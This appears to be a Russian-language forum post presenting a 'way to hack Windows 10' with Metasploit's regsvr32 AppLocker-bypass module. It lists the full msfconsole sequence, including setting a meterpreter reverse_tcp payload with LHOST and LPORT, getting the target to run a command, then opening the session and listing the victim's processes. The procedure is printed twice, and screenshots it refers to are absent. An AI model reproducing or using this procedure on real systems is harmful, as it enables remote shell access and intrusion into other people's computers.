Привет всем! В этой небольшой теме я хочу показать очередной способ взлома Windows, на этот раз это Windows 10. После обновления Metasploit в нем появился достаточно любопытный эксплоит (хотя, может он и раньше там был) - regsvr32_applocker_bypass_server
Итак, приступим, в терминале, вводим следующие команды:
> msfconsole (запускаем Metaslpoit)
> use exploit/windows/misc/regsvr32_applocker_bypass_server
> options (посмотрим доступные настройки эксплойта)
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.0.101 (Ваш локальный адрес)
> set LPORT 4444
> exploit
Если все прошло успешно видим следующее:
То, что я выделил цветом, это команда, которую необходимо ввести в командной строке целевого хоста, для получения сессии meterpreter.
После выполнения команды, в терминале Kali Linux откроется сессия:
> sessions –I 1 (Подключимся к ней)
> ps (Посмотрим список процессов на целевом хосте)
Тестировал я этот способ на реальном ПК с установленной на нем:
Спасибо за внимание.
Итак, приступим, в терминале, вводим следующие команды:
> msfconsole (запускаем Metaslpoit)
> use exploit/windows/misc/regsvr32_applocker_bypass_server
> options (посмотрим доступные настройки эксплойта)
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.0.101 (Ваш локальный адрес)
> set LPORT 4444
> exploit
Если все прошло успешно видим следующее:
То, что я выделил цветом, это команда, которую необходимо ввести в командной строке целевого хоста, для получения сессии meterpreter.
После выполнения команды, в терминале Kali Linux откроется сессия:
> sessions –I 1 (Подключимся к ней)
> ps (Посмотрим список процессов на целевом хосте)
Тестировал я этот способ на реальном ПК с установленной на нем:
Спасибо за внимание.
Последнее редактирование: